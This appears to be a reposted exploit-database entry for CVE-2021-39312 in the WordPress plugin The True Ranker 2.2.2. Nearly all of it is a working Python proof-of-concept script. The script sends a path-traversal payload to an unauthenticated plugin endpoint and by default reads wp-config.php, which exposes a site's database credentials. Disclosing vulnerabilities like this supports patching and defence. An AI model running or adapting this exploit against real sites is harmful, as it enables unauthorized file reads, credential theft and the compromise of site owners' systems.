[webapps] WordPress Plugin The True Ranker 2.2.2 - Arbitrary File Read (Unauthenticated)

4 months ago 33
# Exploit Title: WordPress Plugin The True Ranker 2.2.2 - Arbitrary File Read (Unauthenticated) # Date: 23/12/2021 # Exploit Authors: Nicole Sheinin, Liad Levy # Vendor Homepage: https://wordpress.org/plugins/seo-local-rank/ # Software Link: https://plugins.svn.wordpress.org/seo-local-rank/tags/2.2.2/ # Version: versions <= 2.2.2 # Tested on: MacOS # CVE: CVE-2021-39312 # Github repo: #!/usr/bin/env python3 import argparse, textwrap import requests import sys parser = argparse.ArgumentParser(description="Exploit The True Ranker plugin - Read arbitrary files", formatter_class=argparse.RawTextHelpFormatter) group_must = parser.add_argument_group('must arguments') group_must.add_argument("-u","--url", help="WordPress Target URL (Example: http://127.0.0.1:8080)",required=True) parser.add_argument("-p","--payload", help="Path to read [default] ../../../../../../../../../../wp-config.php", default="../../../../../../../../../../wp-config.php",required=False) args = parser.parse_args() if len(sys.argv) <= 2: print (f"Exploit Usage: ./exploit.py -h [help] -u [url]") sys.exit() HOST = args.url PAYLOAD = args.payload url = "{}/wp-content/plugins/seo-local-rank/admin/vendor/datatables/examples/resources/examples.php".format(HOST) payload = "/scripts/simple.php/{}".format(PAYLOAD) r = requests.post(url,data={'src': payload}) if r.status_code == 200: print(r.text) else: print("No exploit found")
Read Entire Article